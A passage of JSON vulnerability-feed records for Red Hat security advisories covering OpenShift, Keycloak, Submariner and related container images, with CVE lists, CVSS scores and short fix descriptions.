"CVE-2022-40304", "CVE-2022-41717", "CVE-2022-42898", "CVE-2022-47629"], "modified": "2023-02-27T00:54:29", "id": "RHSA-2023:0918", "href": "https://access.redhat.com/errata/RHSA-2023:0918", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-17T14:57:58", "description": "The rh-sso-7/sso76-openshift-rhel8 container image and rh-sso-7/sso7-rhel8-operator operator has been updated for RHEL-8 based Middleware Containers to address the following security issues.\n\nSecurity Fix(es):\n\n* keycloak: path traversal via double URL encoding (CVE-2022-3782)\n\n* keycloak: Session takeover with OIDC offline refreshtokens (CVE-2022-3916)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nUsers of rh-sso-7/sso76-openshift-rhel8 container images and rh-sso-7/sso7-rhel8-operator operator are advised to upgrade to these updated images, which contain backported patches to correct these security issues, fix these bugs and add these enhancements. Users of these images are also encouraged to rebuild all container images that depend on these images.\n\nYou can find images updated by this advisory in Red Hat Container Catalog (see References).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-13T13:57:18", "type": "redhat", "title": "(RHSA-2022:8964) Important: updated rh-sso-7/sso76-openshift-rhel8 container and operator related images", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2022-1304", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-30293", "CVE-2022-37434", "CVE-2022-3782", "CVE-2022-3916", "CVE-2022-42898"], "modified": "2022-12-13T13:57:35", "id": "RHSA-2022:8964", "href": "https://access.redhat.com/errata/RHSA-2022:8964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-17T14:58:04", "description": "Logging Subsystem 5.4.8 - Red Hat OpenShift\n\nSecurity Fix(es):\n\n* jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518)\n\n* golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags (CVE-2022-32149)\n\n* jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)\n\n* jackson-databind: use of deeply nested arrays (CVE-2022-42004)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-16T10:51:23", "type": "redhat", "title": "(RHSA-2022:7435) Moderate: Logging Subsystem 5.4.8 - Red Hat OpenShift security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2020-35525", "CVE-2020-35527", "CVE-2020-36518", "CVE-2022-1304", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-2509", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293", "CVE-2022-32149", "CVE-2022-3515", "CVE-2022-37434", "CVE-2022-40674", "CVE-2022-42003", "CVE-2022-42004"], "modified": "2022-11-16T10:51:42", "id": "RHSA-2022:7435", "href": "https://access.redhat.com/errata/RHSA-2022:7435", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-17T14:57:57", "description": "Submariner enables direct networking between pods and services on different Kubernetes clusters that are either on-premises or in the cloud.\n\nFor more information about Submariner, see the Submariner open source community website at: https://submariner.io/.\n\nThis advisory contains bug fixes and enhancements to the Submariner container images.\n\nSecurity fixes:\n\n* CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags\n\nBugs addressed:\n\n* Build Submariner 0.13.3 (ACM-2226)\n* Verify Submariner with OCP 4.12 (ACM-2435)\n* Submariner does not support cluster \"kube-proxy ipvs mode\" (ACM-2821)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-15T20:03:23", "type": "redhat", "title": "(RHSA-2023:0795) Moderate: RHSA: Submariner 0.13.3 - security updates and bug fixes", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-46848", "CVE-2022-1304", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-2509", "CVE-2022-2601", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293", "CVE-2022-30698", "CVE-2022-30699", "CVE-2022-32149", "CVE-2022-3515", "CVE-2022-35737", "CVE-2022-3775", "CVE-2022-3787", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-42010", "CVE-2022-42011", "CVE-2022-42012", "CVE-2022-42898", "CVE-2022-43680"], "modified": "2023-02-15T20:43:54", "id": "RHSA-2023:0795", "href": "https://access.redhat.com/errata/RHSA-2023:0795", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T18:22:39", "description": "Version 1.27.0 of the OpenShift Serverless Operator is supported on Red Hat\nOpenShift Container Platform versions 4.8, 4.9, 4.10, 4.11 and 4.12. \n\nThis release includes security and bug fixes, and enhancements.\n* golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)\n* golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)\n* golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)\n* golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879)\n\nFor more details about the security issues, including the impact; a CVSS score;\nacknowledgments; and other related information refer to the CVE pages linked in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2023-02-09T09:50:26", "type": "redhat", "title": "(RHSA-2023:0709) Moderate: Release of OpenShift Serverless 1.27.0", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2021-46848", "CVE-2022-1304", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-2509", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27664", "CVE-2022-2879", "CVE-2022-2880", "CVE-2022-30293", "CVE-2022-35737", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41715", "CVE-2022-42010", "CVE-2022-42011", "CVE-2022-42012", "CVE-2022-42898", "CVE-2022-43680", "CVE-2023-21835", "CVE-2023-21843"], "modified": "2023-02-09T09:50:54", "id": "RHSA-2023:0709", "href": "https://access.redhat.com/errata/RHSA-2023:0709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-17T14:57:58", "description": "Version 1.26.0 of the OpenShift Serverless Operator is supported on Red Hat\nOpenShift Container Platform versions 4.8, 4.9, 4.10, and 4.11. \n\nThis release includes security and bug fixes, and enhancements.\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\nFor more details about the security issues, including the impact; a CVSS score;\nacknowledgments; and other related information refer to the CVE pages linked in\nthe References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-13T02:09:25", "type": "redhat", "title": "(RHSA-2022:8938) Low: Release of OpenShift Serverless 1.26.0", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2020-35525", "CVE-2020-35527", "CVE-2021-43565", "CVE-2022-1304", "CVE-2022-21618", "CVE-2022-21619", "CVE-2022-21624", "CVE-2022-21626", "CVE-2022-21628", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-2509", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27191", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-30293", "CVE-2022-3515", "CVE-2022-37434", "CVE-2022-39399"], "modified": "2022-12-13T02:09:38", "id": "RHSA-2022:8938", "href": "https://access.redhat.com/errata/RHSA-2022:8938", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-17T14:57:57", "description": "Submariner enables direct networking between pods and services on different Kubernetes clusters that are either on-premises or in the cloud.\n\nFor more information about Submariner, see the Submariner open source community website at: https://submariner.io/.\n\nThis advisory contains bug fixes and enhancements to the Submariner container images.\n\nSecurity fixes:\n\n* CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY\n* CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters\n* CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps\n* CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests\n\nBugs addressed:\n\n* subctl diagnose firewall metrics does not work on merged kubeconfig (BZ# 2013711)\n* [Submariner] - Fails to increase gateway amount after deployment (BZ# 2097381)\n* Submariner gateway node does not get deleted with subctl cloud cleanup command (BZ# 2108634)\n* submariner GW pods are unable to resolve the DNS of the Broker K8s API URL (BZ# 2119362)\n* Submariner gateway node does not get deployed after applying ManagedClusterAddOn on Openstack (BZ# 2124219)\n* unable to run subctl benchmark latency, pods fail with ImagePullBackOff (BZ# 2130326)\n* [IBM Z] - Submariner addon unistallation doesnt work from ACM console (BZ# 2136442)\n* Tags on AWS security group for gateway node break cloud-controller LoadBalancer (BZ# 2139477)\n* RHACM - Submariner: UI support for OpenStack #19297 (ACM-1242)\n* Submariner OVN support (ACM-1358)\n* Submariner Azure Console support (ACM-1388)\n* ManagedClusterSet consumers migrate to v1beta2 (ACM-1614)\n* Submariner on disconnected ACM #22000 (ACM-1678)\n* Submariner gateway: Error creating AWS security group if already exists (ACM-2055)\n* Submariner gateway security group in AWS not deleted when uninstalling submariner (ACM-2057)\n* The submariner-metrics-proxy pod pulls an image with wrong naming convention (ACM-2058)\n* The submariner-metrics-proxy pod is not part of the Agent readiness check (ACM-2067)\n* Subctl 0.14.0 prints version \"vsubctl\" (ACM-2132)\n* managedclusters \"local-cluster\" not found and missing Submariner Broker CRD (ACM-2145)\n* Add support of ARO to Submariner deployment (ACM-2150)\n* The e2e tests execution fails for \"Basic TCP connectivity\" tests (ACM-2204)\n* Gateway error shown \"diagnose all\" tests (ACM-2206)\n* Submariner does not support cluster \"kube-proxy ipvs mode\"(ACM-2211)\n* Vsphere cluster shows Pod Security admission controller warnings (ACM-2256)\n* Cannot use submariner with OSP and self signed certs (ACM-2274)\n* Subctl diagnose tests spawn nettest image with wrong tag nameing convention (ACM-2387)\n* Subctl 0.14.1 prints version \"devel\" (ACM-2482)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-07T16:35:37", "type": "redhat", "title": "(RHSA-2023:0631) Moderate: RHSA: Submariner 0.14 - bug fix and security updates", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-46848", "CVE-2022-1304", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-2509", "CVE-2022-2601", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27664", "CVE-2022-2880", "CVE-2022-30293", "CVE-2022-30698", "CVE-2022-30699", "CVE-2022-3515", "CVE-2022-35737", "CVE-2022-3775", "CVE-2022-3787", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41715", "CVE-2022-41717", "CVE-2022-42010", "CVE-2022-42011", "CVE-2022-42012", "CVE-2022-42898", "CVE-2022-43680"], "modified": "2023-02-07T16:35:58", "id": "RHSA-2023:0631", "href": "https://access.redhat.com/errata/RHSA-2023:0631", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T16:22:44", "description": "Security Fix(es):\n\n* mtr-web-container: Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing (CVE-2022-42920)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T11:33:15", "type": "redhat", "title": "(RHSA-2023:0470) Important: Migration Toolkit for Runtimes security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2020-35525", "CVE-2020-35527", "CVE-2021-46848", "CVE-2022-0561", "CVE-2022-0562", "CVE-2022-0865", "CVE-2022-0891", "CVE-2022-0908", "CVE-2022-0909", "CVE-2022-0924", "CVE-2022-1304", "CVE-2022-1355", "CVE-2022-1471", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22844", "CVE-2022-2509", "CVE-2022-25308", "CVE-2022-25309", "CVE-2022-25310", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-30293", "CVE-2022-35737", "CVE-2022-37434", "CVE-2022-42898", "CVE-2022-42920"], "modified": "2023-01-26T11:33:34", "id": "RHSA-2023:0470", "href": "https://access.redhat.com/errata/RHSA-2023:0470", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-24T08:47:25", "description": "Secondary Scheduler Operator for Red Hat OpenShift 1.1.1\n\nSecurity Fix(es):\n\n* golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)\n* golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)\n* golang: net/url: JoinPath does not strip relative path components in all circumstances (CVE-2022-32190)\n* golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)\n* golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests (CVE-2022-41717)\n* golang: crypto/tls: large handshake records may cause panics (CVE-2022-41724)\n* golang: net/http, mime/multipart: denial of service from excessive resource consumption (CVE-2022-41725)\n* golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service (CVE-2022-32189)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE page(s)\nlisted in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-18T14:25:47", "type": "redhat", "title": "(RHSA-2023:0584) Moderate: Secondary Scheduler Operator for Red Hat OpenShift 1.1.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-46848", "CVE-2022-1304", "CVE-2022-1586", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27664", "CVE-2022-2880", "CVE-2022-30293", "CVE-2022-32189", "CVE-2022-32190", "CVE-2022-34903", "CVE-2022-35737", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41715", "CVE-2022-41717", "CVE-2022-41724", "CVE-2022-41725", "CVE-2022-42898", "CVE-2022-4304", "CVE-2022-4415", "CVE-2022-4450", "CVE-2022-47629", "CVE-2023-0215", "CVE-2023-0286", "CVE-2023-0361", "CVE-2023-23916"], "modified": "2023-05-18T14:26:25", "id": "RHSA-2023:0584", "href": "https://access.redhat.com/errata/RHSA-2023:0584", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-17T14:57:57", "description": "Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation.\n\nThis advisory covers container images for the release.\n\nSecurity Fix(es):\n\n* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be (CVE-2021-4238)\n* golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879)\n* golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)\n* golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)\n* Istio: Denial of service attack via a specially crafted message (CVE-2022-39278)\n* golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)\n* kiali: error message spoofing in kiali UI (CVE-2022-3962)\n* golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service (CVE-2022-32189)\n\nFor more details about security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, see the CVE page(s) listed in the Container CVEs section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T16:30:30", "type": "redhat", "title": "(RHSA-2023:0542) Important: Red Hat OpenShift Service Mesh 2.3.1 Containers security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2021-23648", "CVE-2021-4238", "CVE-2021-46848", "CVE-2022-1304", "CVE-2022-1705", "CVE-2022-1962", "CVE-2022-21673", "CVE-2022-21698", "CVE-2022-21702", "CVE-2022-21703", "CVE-2022-21713", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27664", "CVE-2022-28131", "CVE-2022-2879", "CVE-2022-2880", "CVE-2022-30293", "CVE-2022-30630", "CVE-2022-30631", "CVE-2022-30632", "CVE-2022-30633", "CVE-2022-30635", "CVE-2022-32148", "CVE-2022-32189", "CVE-2022-3515", "CVE-2022-35737", "CVE-2022-37434", "CVE-2022-39278", "CVE-2022-3962", "CVE-2022-41715", "CVE-2022-42010", "CVE-2022-42011", "CVE-2022-42012", "CVE-2022-42898", "CVE-2022-43680"], "modified": "2023-01-30T16:30:42", "id": "RHSA-2023:0542", "href": "https://access.redhat.com/errata/RHSA-2023:0542", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-25T16:22:43", "description": "OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes.\n\nSecurity Fix(es) from Bugzilla:\n\n* golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879)\n\n* golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)\n\n* golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)\n\n* golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests (CVE-2022-41717)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-09T01:23:02", "type": "redhat", "title": "(RHSA-2023:1174) Moderate: OpenShift API for Data Protection (OADP) 1.1.2 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-46848", "CVE-2022-1122", "CVE-2022-1304", "CVE-2022-2056", "CVE-2022-2057", "CVE-2022-2058", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-2519", "CVE-2022-2520", "CVE-2022-2521", "CVE-2022-25308", "CVE-2022-25309", "CVE-2022-25310", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-2867", "CVE-2022-2868", "CVE-2022-2869", "CVE-2022-2879", "CVE-2022-2880", "CVE-2022-2953", "CVE-2022-30293", "CVE-2022-35737", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41715", "CVE-2022-41717", "CVE-2022-42010", "CVE-2022-42011", "CVE-2022-42012", "CVE-2022-42898", "CVE-2022-43680", "CVE-2022-4415", "CVE-2022-44617", "CVE-2022-46285", "CVE-2022-47629", "CVE-2022-48303", 